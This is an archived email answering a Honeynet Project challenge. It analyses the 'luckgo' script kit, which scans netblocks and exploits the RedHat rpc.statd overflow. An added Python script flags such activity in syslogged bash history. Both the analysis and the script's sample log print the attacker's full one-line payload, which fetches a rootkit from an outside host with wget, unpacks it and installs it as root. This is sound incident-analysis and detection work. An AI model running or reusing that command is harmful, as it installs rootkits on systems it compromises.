From madman@xnet.com Fri Mar 23 10:14:25 2001
Date: Wed, 21 Mar 2001 12:22:34 -0600 (CST)
From: Steve Maks
To: project@honeynet.org
Subject: March Scan

Hopefully it's not too late to submit this, but here's my crack at it.

1. What is the blackhat attempting to do with his command line syntax?

The luckgo script, in its ANSI glory, attempts to hax0r the user-specified IP address blocks.

> Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210

Will try to hax0r the 216.210 class B and install a rootkit.

---

2. What does the tool accomplish?

The tool scans the specified netblocks for systems vulnerable to the rpc.statd overflow in RedHat 6.0/1/2. The bug is described in RedHat's advisory RHSA-2000:043-03. After successfully finding a vulnerable system it will then download and install a rootkit on the system.

---

3. How does the tool work?

The luckgo script will run luckscan-a, which will scan the specified IP blocks looking for an open port 111, then call luckstatdx to attempt the rpc.statd exploit and install the rootkit.

---

4. Is this tool a worm, or would you classify it as something else?

It's a script kiddie tool.

---

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

luckstatdx is a modified version of:

*** statdx ***
Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
*** by ron1n

What is modified is becsys taking credit for the exploit as well as the commands executed on the remote system. The original exploit executed "cd /; ls -alF; id" on the remote host, whereas the modified version executes "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz ; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz", which downloads and installs the rootkit. There are also a few other printfs that becsys has modified.

luckscan-a is a modified version of another large-scale port scanner; which one specifically, I don't know. It searches for a user-specified port, so most likely it was designed for the purpose of large-scale scanning for a certain port.

---

Bonus Question: What information can you obtain about who is using or created the tool?

Anyone who is using the tool is most likely a script kiddie. The person who created the tool is most likely the same, but with a touch of C knowledge. The creator of the tarball also appears to be a Windows user due to the DOS-style CRs in luckstatdx.c. And on an anal note, the archive should've been named luckroot.tar.gz or luckroot.tgz since it is a gzipped tarball. The all-caps filename is also usually a sign the file was FTPed from a Windows machine, but not necessarily.
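The honeypot caught the attack because bash history was being syslogged, and the analysis above names both the binaries involved and the exact fetch-unpack-install chain the modified exploit runs. The following is an added example, not part of the submission or of the luckroot tool, showing how a defender could run those indicators over such history lines: it parses the "HISTORY: PID=... UID=..." record format shown in the message and flags root commands that invoke the named tools or that fetch, unpack and install something in one line. The log sample is constructed for illustration except for the first line, which is the one quoted in the message; the rule names and regexes are my own choices.

```python
"""Flag suspicious entries in syslogged bash history.

Added example (not code from the original submission). Record format is the
one the honeypot logged: "<ts> <host> -bash: HISTORY: PID=<n> UID=<n> <cmd>".
"""
import re

# Constructed sample: line 1 is the entry quoted in the analysis, the rest
# are made-up entries in the same format (including the modified statdx
# payload described in the message).
SAMPLE_LOG = """\
Jan  8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan  8 18:49:20 honeypot -bash: HISTORY: PID=1246 UID=0 ls -la
Jan  8 18:52:01 honeypot -bash: HISTORY: PID=1302 UID=500 vi notes.txt
Jan  8 18:55:40 honeypot -bash: HISTORY: PID=1310 UID=0 cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz ; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz
"""

# One syslogged history record. \s+ after the month tolerates the padded
# single-digit day syslog emits ("Jan  8").
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<shell>\S+): HISTORY: "
    r"PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$"
)

# Binaries named in the analysis, as a whole token (./luckgo, luckscan-a ...).
TOOL_RE = re.compile(r"(?:^|[\s/;|&])(luckgo|luckscan-a|luckstatdx)(?=$|[\s;|&])")

# The three stages of the payload: fetch, unpack, run an installer / clean up.
# All three must appear on one command line to fire, so a stray "tar" in a
# filename (xzibit.tar.gz) does not trigger the rule by itself.
FETCH_RE = re.compile(r"\b(?:wget|curl|ftp|lynx)\b")
UNPACK_RE = re.compile(r"\btar\b")
INSTALL_RE = re.compile(r"(?:\./install\b|\brm -rf\b)")


def parse_line(line):
    """Return a dict of fields for one history record, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["uid"] = int(rec["uid"])
    return rec


def classify(rec):
    """Return the list of rule names the record's command matches (empty if clean)."""
    cmd = rec["cmd"]
    reasons = []
    if TOOL_RE.search(cmd):
        reasons.append("scanner-or-exploit-binary")
    if FETCH_RE.search(cmd) and UNPACK_RE.search(cmd) and INSTALL_RE.search(cmd):
        reasons.append("fetch-unpack-install")
    if reasons and rec["uid"] == 0:
        # Same command run as root is what turns a download into a rootkit.
        reasons.append("as-root")
    return reasons


def scan_history(text):
    """Parse every line of a history log and return the records that match a rule."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            rec["reasons"] = reasons
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_history(SAMPLE_LOG):
        print(f"{hit['ts']} pid={hit['pid']} uid={hit['uid']} "
              f"{','.join(hit['reasons'])}: {hit['cmd']}")
```

Run against the sample, it flags the luckgo invocation and the wget/tar/install line and leaves the ls and vi entries alone. The UID check is the one that matters operationally: the payload's "cd /; rm -rf lamerk xzibit.tar.gz" cleanup only helps the attacker if the install already ran as root, so a root-owned fetch-unpack-install line is worth an alert even without the tool names.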